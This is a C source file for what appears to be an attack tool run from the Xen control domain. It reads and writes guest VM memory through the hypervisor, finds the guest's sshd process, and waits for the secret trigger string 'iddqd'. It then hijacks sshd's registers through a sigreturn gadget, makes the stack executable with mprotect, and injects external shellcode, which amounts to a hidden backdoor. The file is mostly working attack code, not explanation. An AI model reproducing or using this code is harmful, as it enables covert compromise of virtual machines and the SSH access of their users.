#include <sys/mman.h>
#include <xenctrl.h>
#include <asm/page.h>
#include <unistd.h>
#include <stdio.h>
//#define syscall_call 0xc0404ea0
//#define INIT 0xc0669300
#define DOMAIN 0
#define VCPU 0
#define OFF_MASK (PAGE_SIZE-1)
#include "kallsyms.c"

unsigned long my_xc_translate_foreign_address(int xc_handle, uint32_t dom,
					      int vcpu,
					      unsigned long long virt,
					      int pgd);
char cmd[20];
int hnd;
void *map_addr(unsigned int cr3, unsigned int addr, int size)
{
	char *ptr;
	int nrpages = size >> 12;
	int mfn[nrpages];
	int i;
	for (i = 0; i < nrpages; i++) {
		mfn[i] =
		    my_xc_translate_foreign_address(hnd, DOMAIN, VCPU,
						    addr + i * PAGE_SIZE, cr3);
		if (mfn[i] <= 0)
			return 0;
	}
	return xc_map_foreign_batch(hnd, DOMAIN, PROT_READ | PROT_WRITE,
				    mfn, nrpages);
//      return xc_map_foreign_range(hnd, DOMAIN,
//                                  size, PROT_READ | PROT_WRITE, mfn);
}
void *map_addr_noerr(unsigned int cr3, unsigned int addr, int size)
{
	char *ptr = map_addr(cr3, addr, size);
	if (ptr == -1 || ptr == 0) {
		perror("map_addr");
		exit(1);
	}
	return ptr;
}

#define SIGRET "\xb8\x77\x00\x00\x00\xcd\x80"
unsigned int find_sigreturn(unsigned int mfn, unsigned int int80)
{
	int i;
	unsigned int addr = int80 & PAGE_MASK;
	unsigned int offset = 0;
	char *ptr = map_addr_noerr(mfn, addr, PAGE_SIZE);
	if (*(unsigned short *) (ptr + (int80 & OFF_MASK)) != 0x80cd) {
		printf("eip not after int 0x80\n");
		exit(1);
	}
	for (i = 0; i < PAGE_SIZE - sizeof(SIGRET); i++)
		if (!memcmp(ptr + i, SIGRET, sizeof(SIGRET) - 1)) {
			printf("sigret offset=0x%x\n", i);
			munmap(ptr, PAGE_SIZE);
			return addr + i;
		}
	printf("cannot find sigret in vdso\n");
	exit(1);
}

#include "uregs.h"
extern void shellcode();
extern void shellcode_end();
void checktrigger(struct uregs *u, int mm)
{
	char buf[20];
	unsigned int pgd, mfn, int80;
	char *ptr;
	unsigned int addr = mm & ~4095;
	unsigned int offset = mm & 4095;
	int len = offset + pgd_offset() + 4 > 4095 ? 8192 : PAGE_SIZE;
	printf("eax=0x%x ebx=0x%x ecx=0x%x edx=0x%x esp=0x%x oldss=0x%x\n",
	       u->orig_eax,
	       u->ebx, u->ecx, u->edx, u->oldesp, (int) u->oldss);
	if (u->orig_eax != 3 || u->ebx > 6
	    || u->ecx & 0xbf000000 != 0xbf000000 || u->edx != 1)
		return;
	ptr = map_addr_noerr(0, addr, len);
	pgd = *(unsigned int *) (ptr + offset + pgd_offset());
	munmap(ptr, len);
	mfn = my_xc_translate_foreign_address(hnd, DOMAIN, VCPU, pgd, 0);
//printf("vdso mfn=0x%x\n",     
//  my_xc_translate_foreign_address(hnd, DOMAIN, 0, u->eip, mfn));
//  return;
	addr = u->oldesp & PAGE_MASK;
	offset = u->oldesp & OFF_MASK;
	len = (offset + (u->ecx - u->oldesp) + 4 + PAGE_SIZE-1) & PAGE_MASK;
	ptr = map_addr_noerr(mfn, addr, len);
	memset(buf, 0, sizeof(buf));
	memcpy(buf, ptr + offset + (u->ecx - u->oldesp) - 5, 5);
	printf("id string=%s\n", buf);
	if (!strcmp(buf, "iddqd")) {
		int80 = u->eip - 2;
//  u->eip=(u->eip&~4095)|0x421;
		u->eip = find_sigreturn(mfn, int80);
		u->eax = 125;	//mprotect
		u->ebx = addr;
		u->ecx = len;
		u->edx = PROT_READ | PROT_WRITE | PROT_EXEC;
		setup_sigret(u, ptr + offset - 8, int80,
			     addr + offset + sigframe_size());
		*(unsigned int *) (ptr + offset + sigframe_size()) =
		    addr + offset + sigframe_size() + 4;
		memcpy(ptr + offset + sigframe_size() + 4, shellcode,
		       (int) shellcode_end - (int) shellcode);
	}
	munmap(ptr, len);
}



int getesp(int esp0, int mm)
{
	int i;
	char *ptr;
	unsigned int addr = esp0 & PAGE_MASK;
	unsigned int offset = esp0 & OFF_MASK;
	int len = PAGE_SIZE;
	struct uregs *u;
	ptr = map_addr_noerr(0, addr, len);
#define MAXWORDS 64
	for (i = 0; i < MAXWORDS; i++)
//        printf("esp0[-%d]=0x%x\n", i, *(unsigned int*)(ptr+offset-4*i));
		if (*(unsigned int *) (ptr + offset - 4 * i) ==
		    syscall_call + 7)
			break;
	if (i == MAXWORDS)
		goto out;
	u = ptr + offset - 4 * i + 4;
	checktrigger(u, mm);
//        *(unsigned int*)(ptr+offset-4*5)=0x8048444;
      out:
	munmap(ptr, len);
	return 0;
}

int get_one_task(int task, int *mm, int *esp0)
{
	char *ptr;
	int ret;
	unsigned int addr = task & PAGE_MASK;
	unsigned int offset = task & OFF_MASK;
	int len = (offset + task_struct_size() + PAGE_SIZE - 1) & PAGE_MASK;
//      int len=offset+0x1b0>4095?8192:PAGE_SIZE;
	int pid;
	ptr = map_addr_noerr(0, addr, len);
	memcpy(cmd, ptr + offset + comm_offset(), 16);
	cmd[16] = 0;
	pid = *(unsigned int *) (ptr + offset + pid_offset());
	printf("%d: 0x%x: %s\n", pid, task, cmd);
	*mm = *(unsigned int *) (ptr + offset + mm_offset());
	*esp0 =
	    *(unsigned int *) (ptr + offset + thread_offset() +
			       esp0_offset());
	ret =
	    *(unsigned int *) (ptr + offset + tasks_offset()) -
	    tasks_offset();
	munmap(ptr, len);
	return ret;
}
void
scan_for_iddqd()
{
	int prevaddr, addr, cnt = 0, i, mm, esp0;
	hnd = xc_interface_open();
	addr = init_task;
	do {
		cnt++;
		prevaddr = addr;
		addr = get_one_task(addr, &mm, &esp0);
		if (!strcmp(cmd, "sshd")) {
			printf("esp0=0x%x\n", esp0);
			getesp(esp0, mm);
//                      getuser(mm);
		}
	} while (addr != init_task && cnt < 10000);
}
#if 0
main()
{
scan_for_iddqd();
}
#endif

//#include <xc_private.h>
#define DPRINTF printf

#if defined(__i386__)

#define L1_PAGETABLE_SHIFT_PAE	12
#define L2_PAGETABLE_SHIFT_PAE	21
#define L3_PAGETABLE_SHIFT_PAE	30

#define L1_PAGETABLE_SHIFT		12
#define L2_PAGETABLE_SHIFT		22

#define L0_PAGETABLE_MASK_PAE	0x0000000ffffff000ULL
#define L1_PAGETABLE_MASK_PAE	0x1ffULL
#define L2_PAGETABLE_MASK_PAE	0x1ffULL
#define L3_PAGETABLE_MASK_PAE	0x3ULL

#define L0_PAGETABLE_MASK		0xfffff000ULL
#define L1_PAGETABLE_MASK		0x3ffULL
#define L2_PAGETABLE_MASK		0x3ffULL

#elif defined(__x86_64__)

#define L1_PAGETABLE_SHIFT_PAE	12
#define L2_PAGETABLE_SHIFT_PAE	21
#define L3_PAGETABLE_SHIFT_PAE	30
#define L4_PAGETABLE_SHIFT_PAE	39

#define L1_PAGETABLE_SHIFT		L1_PAGETABLE_SHIFT_PAE
#define L2_PAGETABLE_SHIFT		L2_PAGETABLE_SHIFT_PAE

#define L0_PAGETABLE_MASK_PAE	0x000000fffffff000ULL
#define L1_PAGETABLE_MASK_PAE	0x1ffULL
#define L2_PAGETABLE_MASK_PAE	0x1ffULL
#define L3_PAGETABLE_MASK_PAE	0x1ffULL
#define L4_PAGETABLE_MASK_PAE	0x1ffULL

#define L0_PAGETABLE_MASK		L0_PAGETABLE_MASK_PAE
#define L1_PAGETABLE_MASK		L1_PAGETABLE_MASK_PAE
#define L2_PAGETABLE_MASK		L2_PAGETABLE_MASK_PAE

#endif

unsigned long my_xc_translate_foreign_address(int xc_handle,
					      uint32_t dom,
					      int vcpu,
					      unsigned long long
					      virt, int pgdx)
{
	vcpu_guest_context_t ctx;
	static unsigned long long cr3, oldcr3 = 0;
	void *pd, *pt, *pdppage = NULL, *pdp, *pml = NULL;
	unsigned long long pde, pte, pdpe, pmle;
	unsigned long mfn = 0;
#if defined (__i386__)
	static int pt_levels = 0;

	if (pt_levels == 0) {
		xen_capabilities_info_t xen_caps = "";

		if (xc_version(xc_handle, XENVER_capabilities, &xen_caps)
		    != 0)
			goto out;
		if (strstr(xen_caps, "xen-3.0-x86_64"))
			pt_levels = 4;
		else if (strstr(xen_caps, "xen-3.0-x86_32p"))
			pt_levels = 3;
		else if (strstr(xen_caps, "xen-3.0-x86_32"))
			pt_levels = 2;
		else
			goto out;
	}
#elif defined (__x86_64__)
#define pt_levels 4
#endif

	if (pgdx)
		cr3 = xen_pfn_to_cr3(pgdx);
        else if (oldcr3)
                cr3=oldcr3;
        else {       
        	if (xc_vcpu_getcontext(xc_handle, dom, vcpu, &ctx) != 0) {
	        	DPRINTF("failed to retreive vcpu context\n");
	        	goto out;
                }
        	cr3 = oldcr3 = ((unsigned long long) xen_cr3_to_pfn(ctx.ctrlreg[3]))
	        << PAGE_SHIFT;
        }
#if defined(__i386__)
	pmle = cr3;
#elif defined(__x86_64__)
	pml =
	    xc_map_foreign_range(xc_handle, dom, PAGE_SIZE,
				 PROT_READ, cr3 >> PAGE_SHIFT);
	if (pml == NULL) {
		DPRINTF("failed to map PML4\n");
		goto out;
	}
	pmle =
	    *(unsigned long long *) (pml +
				     8 *
				     ((virt >>
				       L4_PAGETABLE_SHIFT_PAE) &
				      L4_PAGETABLE_MASK_PAE));
	if ((pmle & 1) == 0) {
		DPRINTF("page entry not present in PML4\n");
		goto out_unmap_pml;
	}
#endif

	/* Page Directory Pointer Table */

	if (pt_levels >= 3) {
		pdppage =
		    xc_map_foreign_range(xc_handle, dom, PAGE_SIZE,
					 PROT_READ, pmle >> PAGE_SHIFT);
		if (pdppage == NULL) {
			DPRINTF("failed to map PDP\n");
			goto out_unmap_pml;
		}
		if (pt_levels >= 4)
			pdp = pdppage;
		else
			/* PDP is only 32 bit aligned with 3 level pts */
			pdp = pdppage + (pmle & ~(XC_PAGE_MASK | 0x1f));

		pdpe =
		    *(unsigned long long *) (pdp +
					     8 *
					     ((virt >>
					       L3_PAGETABLE_SHIFT_PAE)
					      & L3_PAGETABLE_MASK_PAE));

		if ((pdpe & 1) == 0) {
			DPRINTF("page entry not present in PDP\n");
			goto out_unmap_pdp;
		}
	} else {
		pdpe = pmle;
	}

	/* Page Directory */

	pd = xc_map_foreign_range(xc_handle, dom, PAGE_SIZE,
				  PROT_READ, pdpe >> PAGE_SHIFT);
	if (pd == NULL) {
		DPRINTF("failed to map PD\n");
		goto out_unmap_pdp;
	}

	if (pt_levels >= 3)
		pde =
		    *(unsigned long long *) (pd +
					     8 *
					     ((virt >>
					       L2_PAGETABLE_SHIFT_PAE)
					      & L2_PAGETABLE_MASK_PAE));
	else
		pde =
		    *(unsigned long long *) (pd +
					     4 *
					     ((virt >> L2_PAGETABLE_SHIFT)
					      & L2_PAGETABLE_MASK));

	if ((pde & 1) == 0) {
		DPRINTF("page entry not present in PD\n");
		goto out_unmap_pd;
	}

	/* Page Table */

	if (pde & 0x00000008) {	/* 4M page (or 2M in PAE mode) */
		DPRINTF("Cannot currently cope with 2/4M pages\n");
		exit(-1);
	} else {		/* 4k page */
		pt = xc_map_foreign_range(xc_handle, dom,
					  PAGE_SIZE, PROT_READ,
					  pde >> PAGE_SHIFT);

		if (pt == NULL) {
			DPRINTF("failed to map PT\n");
			goto out_unmap_pd;
		}

		if (pt_levels >= 3)
			pte =
			    *(unsigned long long *) (pt +
						     8 *
						     ((virt >>
						       L1_PAGETABLE_SHIFT_PAE)
						      &
						      L1_PAGETABLE_MASK_PAE));
		else
			pte =
			    *(unsigned long long *) (pt +
						     4 *
						     ((virt >>
						       L1_PAGETABLE_SHIFT)
						      &
						      L1_PAGETABLE_MASK));

		if ((pte & 0x00000001) == 0) {
			DPRINTF("page entry not present in PT\n");
			goto out_unmap_pt;
		}

		if (pt_levels >= 3)
			mfn = (pte & L0_PAGETABLE_MASK_PAE) >> PAGE_SHIFT;
		else
			mfn = (pte & L0_PAGETABLE_MASK) >> PAGE_SHIFT;
	}

      out_unmap_pt:
	munmap(pt, PAGE_SIZE);
      out_unmap_pd:
	munmap(pd, PAGE_SIZE);
      out_unmap_pdp:
	munmap(pdppage, PAGE_SIZE);
      out_unmap_pml:
	munmap(pml, PAGE_SIZE);
      out:
	return mfn;
}

/*
 * Local variables:
 * mode: C
 * c-set-style: "BSD"
 * c-basic-offset: 4
 * tab-width: 4
 * indent-tabs-mode: nil
 * End:
 */
